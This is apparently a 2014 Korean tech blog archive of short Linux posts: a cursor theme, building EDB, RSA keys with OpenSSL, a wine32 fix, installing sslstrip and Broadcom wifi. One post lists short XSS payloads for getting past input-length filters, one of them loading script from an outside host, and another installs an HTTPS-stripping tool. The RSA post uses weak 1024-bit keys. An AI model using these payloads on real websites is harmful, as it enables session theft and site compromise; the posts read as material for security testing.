8/20/2014

[Debian] 왼손 마우스 커서 테마 적용(Set Left handed mouse cursor themes)

왼손으로 마우스를 쓰다보면 커서가 참 불편합니다.

오늘은 데비안 환경에서 왼손 커서로 변경하는 법에 대해 작성하였습니다.

기존 마우스 커서 테마적용과 동일합니다.

웹상에서 왼손용 마우스 커서 아이콘을 다운로드합니다. 
(download left cursor icons themes)

압축을 해제합니다. (extract downloaded file)

#> tar -xvf themefile.tar.gz

/usr/share/icons 하단으로 테마파일을 옮깁니다.
(themefile -> /usr/shared/icons)

#> /usr/share/icons


시스템의 마우스 설정에서 테마 부분에 가면 해당 테마파일이 있습니다. 적용합니다.
(set system config > mouse themes)

 





Share: | Coffee Me:

8/14/2014

EDB(Evan's Debugger) 설치 - Debian에서 EDB 설치하기/Install Evan's Debugger on Debian)

OllyDbg, Immunity Debugger와 함께 많이 알려진 디버거인 EDB 입니다.
EDB는 리눅스 기반의 디버거이며 Olly나 이뮤니티 디버거와는 다르게 리눅스에서 디버깅이 가능합니다.



Debian 환경에서의 EDB 설치방법입니다.

1) 컴파일에 필요한 사전 라이브러리 및 명령 설치
 + qt4 라이브러리와 qmake를 설치합니다. (Install qt4 lib and qmake)
#> apt-get install libqt4-dev  
#> apt-get install qt4-qmake

 + libboost 를 설치합니다. (Install libboost) //
#> apt-get install libboost-all-dev


2) edb 파일 다운로드(Download EDB)
#> wget www.codef00.com/projects/debugger-0.9.20.tgz

or

https://drive.google.com/file/d/0B73B21L8PvWnYlNUMEk0TW1vbk0/edit?usp=sharing

3) 다운로드 받은 debugger-0.9.20.tgz 파일 압축 해제(extract tgz file)
#> tar -xvf debugger-0.9.20.tgz

4) qmake & make 를 통한 설치(excute qmake and make)
#> qmake -makefile DEFAULT_PLUGIN_PATH="/usr/lib/edb/"
#> make
#> make install or #> make INSTALL_ROOT=/usr install  (추천) 

5) edb failed to successfully load the debugger core plugin 에러 발생 시
make 할때 INSTALL_ROOT=/usr/lib/edb 로 설정 후 edb 설정>Directory>Plugin dir 을 /usr/lib/edb로 지정합니다.
4번에서 추천표시한 내용(#> make INSTALL_ROOT=/usr install)

간단하게 설치 완료하였습니다. 데비안 배포버전 이외에 다른 버전에서도 apt, yum 등을 이용해 라이브러리 및 컴파일 도구 설치 후
설치가 가능합니다.

감사합니다.
Share: | Coffee Me:

8/09/2014

[XSS] Short XSS(Cross site script) 공격구문 삽입부분이 작을때 XSS를 삽입하는 방법들

Short XSS

XSS에 대한 체킹을 하다보면 특수문자나 구문에 대해 필터링이 이루어지지는 않지만
입력 글자 수 제한 등 여러가지 난관에 막힙니다.


그 중 입력 글자 수 제한에 대해 우회하는 방법에 대한 이야기입니다.

1) 외부 링크에서 코드 호출하기(Calling code from external links)
짧은 주소의 도메인을 가지고 있을 시 가능합니다.

<script src=//url.u/x.js></script>

공격코드 자체를 x.js  같이 파일로 생성해두고 사용하는것이 방법으로 길이에 대한 필터링을 빗겨갈 수 있습니다.


2) XSS 삽입부분 다수일때 주석 활용하기(Use comment out)
한 페이지에서 XSS는 여러부분에 대해 삽입이 가능한 경우가 많습니다.

입력이 가능한 부분이 name, age 라는 파라미터라고 가정하였을때 아래와 같은 형식으로 공격구문을 작성합니다.

name: <script>alert(1)<!--
age: --></script>

두 파라미터가 삽입되는 지점 사이에 html 코드들은 주석처리되며 alert 구문만 동작시킬 수 있습니다. 위 경우는 삽입구문 내 <!-- --> 를 통한 주석구문이 없어야됩니다.

3) 취약 속성사용이 가능할 때 의미없는 태그 사용(Meaningless HTML tags)
onclick, onmouseover, onkeyup 등 XSS 사용가능한 속성은 매우 많습니다.
이와같은 속성은 태그 종류에 상관없이 사용이 가능하기 때문에 간단한 테스트 시 많이 사용합니다.

<x onclick=alert(1)>
<b onkeyup=alert(1)>

위와같이 x, b 등 의미없는 태그를 이용하여 공격코드의 길이를 줄일 수 있습니다.

위 방법이외에도 다양한 방법으로 XSS 필터링 및 입력 범위 제한에 대해 우회가 가능합니다. 조금이나마 도움이 되었으면 합니다.

감사합니다. ;)





Share: | Coffee Me:

8/05/2014

[SSL] OpenSSL을 이용한 RSA 공개키, 개인키 생성 (Create RSA Key in OpenSSL/Windows)

OpenSSL 을 이용하여 RSA 키(공개키, 개인키)를 생성하는 방법입니다.
운영하던 다른 블로그에서도 작성한 내용이지만.. 작성해봅니다 :)

OpenSSL 설치
Linux: apt, yum을 이용하여 설치합니다.

#> apt-get install openssl

Windows:  윈도우 바이너리 버전 다운로드(https://www.openssl.org/related/binaries.html)


1) 개인키 생성(Create Private Key)
genrsa 를 사용하여 1024 크기의 개인키 생성

#> genrsa -out private_key.pem 1024



생성된 데이터 확인 시 RSA PRIVATE KEY 즉 개인키라고 명시 후 키값이 들어갑니다.



2) 공개키 생성(Create Public Key)
rsa 명령을 사용하여 공개키를 생성합니다.
키는 위에서 생성한 비밀키(Private Key)를 이용하여 생성합니다.
(위에서 생성한 비밀키: private_key.pem)

#> rsa -in private_key.pem -out public_key.pem -pubout




 데이터 확인 시 비밀키와 같은 형식으로 공개키가 생성되었습니다.



Share: | Coffee Me:

8/04/2014

[BUG] Wine - unable to find wine executable: the wine32 package probably needs to be installed. (Install wine32)

 wine 에러발생 시 해결사항
 error wine32

64bit 사용 시 wine 32 를 따로 설치해줘야함.


#> wine
unable to find wine executable: the wine32 package probably needs to be installed.

dpkg 에서 i386 아키텍쳐 추가
add architecture i386

#> dpkg --add-architecture i386
#> apt-get update

#> apt-cache search wine32
      wine32 - Windows API implementation - 32-bit binary loader  
      wine32-dev-tools - Windows API implementation - 32-bit developer tools

#> apt-get install wine32

#> wine
Usage: wine PROGRAM [ARGUMENTS...]   Run the specified program
       wine --help                   Display this help and exit
       wine --version                Output version information and exit



Share: | Coffee Me:

7/31/2014

[hack/sslstrip] install sslstrip on debian (sslstrip 데비안 설치하기)


sslstrip 을 데비안에서 간단하게 설치하는 방법입니다.
소스코드를 직접 받아 build 하여도 상관없지만.. 손쉽게 설치하기 위해선 파이썬 패키지 관리자를 이용하는 것이 좋습니다.


* Install sslstrip on Debian *

먼저 패키지 관리자 설치를 위해 python-pip를 설치합니다.

데비안에서는 apt를 통해 쉽게 설치가 가능합니다.

1) 먼저 pip설치에 필요한 python-dev 먼저 설치합니다.

# apt-get install python-dev


2) python-dev가 설치되었다면 python-pip 를 설치합니다.

# apt-get install python-pip


3) 마지막으로 pip를 통해 sslstrip을 설치합니다.
# pip install sslstrip




# apt-get install python-dev python-pip;pip install sslstrip


Share: | Coffee Me:

7/30/2014

DEBIAN - 무선랜 설정(Wireless) / Debian 8.0 64bit

Debian 8.0 무선랜 설정방법입니다.

Device: SONY VAIO fit 14

동일 와이파이 모델을 사용한다면 해당 방법으로 설정 가능합니다.

Debian 8.0 (64bit)

1) bcmwl 64bit 버전 다운로드 (Download bcmwl 64bit)

# wget http://de.archive.ubuntu.com/ubuntu/pool/restricted/b/bcmwl/bcmwl-kernel-source_6.20.155.1+bdcom-0ubuntu6_amd64.deb


2) 필요 패키지 설치 (Install Pakage)
# apt-get install dkms libc6-dev linux-libc-dev

3) bcmwl 64bit 설치 (Install bcmwl)

# dpkg -i bcmwl-kernel-source_6.20.155.1+bdcom-0ubuntu6_amd64.deb


4) 추가 패키지 설치(install Pakage)
# apt-get install build-essential dkms broadcom-sta-dkms firnware-brcm80211

5) wl 세팅 (wl setting)
# modprobe wl



Share: | Coffee Me: